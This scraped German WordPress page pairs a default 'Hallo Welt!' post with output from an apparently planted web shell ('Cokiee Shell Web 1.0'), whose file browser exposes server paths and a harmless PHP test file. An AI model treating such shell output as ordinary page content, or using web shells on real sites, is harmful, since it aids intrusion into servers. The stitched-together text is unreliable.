Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/access_modifiers_012.phpt |
--TEST-- Trigger __call() in lieu of non visible methods when called via a callback. --FILE-- <?php class C { protected function prot() { } private function priv() { } public function __call($name, $args) { echo "In __call() for method $name()\n"; } } $c = new C; call_user_func(array($c, 'none')); call_user_func(array($c, 'prot')); call_user_func(array($c, 'priv')); ?> --EXPECTF-- In __call() for method none() In __call() for method prot() In __call() for method priv()
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare